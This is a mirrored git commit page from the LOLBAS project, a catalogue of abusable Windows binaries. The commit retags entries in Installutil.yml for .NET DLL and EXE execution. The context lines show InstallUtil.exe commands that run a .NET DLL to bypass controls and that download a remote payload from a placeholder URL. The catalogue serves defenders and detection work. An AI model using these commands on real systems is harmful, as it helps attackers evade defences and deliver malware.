mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-30 16:54:00 +01:00
Update Installutil.yml
Changed tags Execute DLL to Execute .NetDLL Added Execute: .NetEXE tag
This commit is contained in:
parent
0795916fba
commit
56ad2e7593
@ -12,7 +12,8 @@ Commands:
|
|||||||
MitreID: T1218.004
|
MitreID: T1218.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
Tags:
|
Tags:
|
||||||
- Execute: DLL
|
- Execute: .NetDLL
|
||||||
|
- Execute: .NetEXE
|
||||||
- Input: Custom Format
|
- Input: Custom Format
|
||||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
Description: Execute the target .NET DLL or EXE.
|
Description: Execute the target .NET DLL or EXE.
|
||||||
@ -22,7 +23,8 @@ Commands:
|
|||||||
MitreID: T1218.004
|
MitreID: T1218.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
Tags:
|
Tags:
|
||||||
- Execute: DLL
|
- Execute: .NetDLL
|
||||||
|
- Execute: .NetEXE
|
||||||
- Input: Custom Format
|
- Input: Custom Format
|
||||||
- Command: InstallUtil.exe https://example.com/payload
|
- Command: InstallUtil.exe https://example.com/payload
|
||||||
Description: It will download a remote payload and place it in INetCache.
|
Description: It will download a remote payload and place it in INetCache.
|
||||||
|
Loading…
Reference in New Issue
Block a user